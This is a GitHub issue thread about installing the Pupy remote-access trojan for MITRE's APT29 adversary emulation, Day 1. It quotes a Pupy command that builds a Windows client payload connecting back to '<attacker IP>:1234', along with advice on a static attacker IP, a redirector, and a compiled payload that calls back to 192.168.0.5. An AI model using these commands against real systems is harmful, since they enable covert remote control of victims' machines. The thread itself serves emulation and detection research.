Closed mark777t closed 3 years ago
@mark777t sorry to hear you ran into issues. It looks like Pupy has been going through some updates, but check out their Installation guidance -- https://github.com/n1nj4sec/pupy/wiki/Installation. In this case you just need to get Pupy installed and listen on port 1234.
Also, @Cyb3rWard0g had success using a fork and checking out an older branch -- https://github.com/Cyb3rWard0g/docker-pupy/blob/master/20191226/Dockerfile#L56-L58. You may be able to just use his Docker image as well -- https://github.com/Cyb3rWard0g/docker-pupy
Hey @mark777t , yeah Pupy from last year to today (A lot has changed). I had to create my own image and align it with the latest commit that worked with the setup for Day 1 emulation. The instructions in the README should work for you to try Day 1 😄 .
README: https://github.com/Cyb3rWard0g/docker-pupy SCRIPT to setup adversary depending on what day or scenario you are testing: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/scripts/Set-Adversary.sh
This is the part of the script that I use to run Day 1: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/scripts/Set-Adversary.sh#L91-L96
Video 😆 : https://youtu.be/fJAuBrzYTzI
Hey @Cyb3rWard0g @jcwilliamsATmitre , Thank you for help. Other issue i get stuck with is, there is no static ip on my machine, trying to create payload
gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host
@mark777t check out https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payload_configs.md#create-day-1-payloads. We have also included a compiled payload (calling back to 192.168.0.5, https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payloads/cod.3aka3.scr) but if you want to generate your own we used the command gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host <attacker IP>:1234
. Here's the documentation from Pupy too if that helps - https://github.com/n1nj4sec/pupy/wiki/Get-Started#payloads-generation
You will need a static IP on your attacker host (or redirector if we decide to use one) though so the payload has somewhere consistent to reach back to
Found the payload file. In case of Cyb3rWard0g setup the location is in the docker: /var/lib/docker/overlay2/......./opt/pupy/pupy.....
@Cyb3rWard0g How did you configure the cod.3aka3.scr payload? I configured it to the linux ip port 1234 (gen -o cod.3aka3.scr -f client -O windows -A x64 connect -t ec4 --host
Hey @mark777t , I just used the one provided with the results in here: https://github.com/mitre-attack/attack-arsenal/tree/master/adversary_emulation/APT29/Emulation_Plan/Day%201/payloads and just align my environment with almost all default settings: https://github.com/OTRF/mordor-labs/tree/master/environments/attack-evals/apt29
Also remember that Day 1 has a redirector for Pupy. This is how I set up the redirector and pupy from a network perspective: https://github.com/OTRF/mordor-labs/blob/master/environments/attack-evals/apt29/azuredeploy.json#L286-L311 . I hope that helps.
Tested on Ubuntu 18.04.3 LTS
Scenario: As described in the install_day1_tools.sh (https://github.com/mitre-attack/attack-arsenal/blob/master/adversary_emulation/APT29/Emulation_Plan/Day%201/install_day1_tools.sh)
Install pre-reqs
sudo apt update -y sudo apt install curl git -y
Install Pupy RAT
git clone --recursive https://github.com/n1nj4sec/pupy.git cd pupy ./install.sh sed 's/9000:9000/1234:1234/g' pupy/conf/docker-compose.yml > /tmp/docker-compose.yml
sed command failed because docker-compose.yml doesn't exist.
(docker installed on the system)
Can you please provide steps to fix this issue?
Thanks